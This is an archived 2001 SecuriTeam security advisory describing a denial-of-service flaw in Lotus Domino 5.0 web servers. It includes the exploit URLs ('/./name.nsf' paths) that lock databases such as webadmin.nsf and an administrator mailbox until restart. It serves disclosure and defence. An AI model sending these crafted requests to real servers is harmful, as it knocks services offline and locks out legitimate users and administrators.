[NEWS] Lotus Domino Web Server DoS Vulnerability (DB Lock)

From: support@securiteam.com
Date: 12/11/01

• Previous message: support@securiteam.com: "[NEWS] Workaround Addresses JRun Server SSIFilter Security Issue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 11 Dec 2001 14:36:20 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Lotus Domino Web Server DoS Vulnerability (DB Lock)
------------------------------------------------------------------------

SUMMARY

With a specially crafted URL, an anonymous user can lock the databases
accesses of the Lotus Notes server. This would result in the fact that any
Lotus Notes users (even the administrators and the servers) cannot access
the targeted databases until the lotus domino server is restarted.

DETAILS

Vulnerable systems:
Lotus Domino version 5.0.5
Lotus Domino version 5.0

Exploit:
General syntax:
http://server/directory/./base_name.nsf

For example, to lock the WEDADMIN.NSF database:
http://server/./webadmin.nsf

To lock the administrator mailbox:
http://server/mail/./administrator.nsf

Vendor status:
Lotus was contacted on the 11/23/01, but no response was received.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:Sebastien.EXT-MICHAUD@atofina.com> Sebastien EXT-MICHAUD.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

---

• Previous message: support@securiteam.com: "[NEWS] Workaround Addresses JRun Server SSIFilter Security Issue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Linked Excel creating lock on database ... I have an application that uses two databases on a server (both a front-end ... Excel linked table will lock out anyone else trying to use data from the ... It appears that the first person in puts a lock on all records and not just ... (microsoft.public.access.externaldata) [NEWS] Lotus Domino DoS (Message Loop) ... Lotus Domino DoS (Message Loop) ... When a message is sent to a Lotus Domino server with an envelope similar ... There is a row of tabs on the top; ... (Securiteam) Vulnerability discovered on Lotus Domino server "admin4.nsf" ... I'm doing an external blackbox PT on a mail server running Lotus ... The server OS is Windows 2000 and web server is Lotus Domino. ... this vulnerability and how to get a proper sense of it. ... vulnerability management needs. ... (Pen-Test) [NT] Lotus Domino Physical Path Revealed ... Due to problems handling Windows DOS devices, the Domino Server can be ... - Lotus Domino version 5.0.9a on Windows 2000 Server ... The vendor was contacted on 7 February, ... (Securiteam) Denial of Service in Lotus Domino 5.08 and earlier HTTP Server ... Denial of Service in Lotus Domino 5.08 and earlier HTTP Server ... There exists a DOS in the current version of Lotus Domino 5.08 and earlier. ... (Bugtraq)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > Securiteam  > 2001-12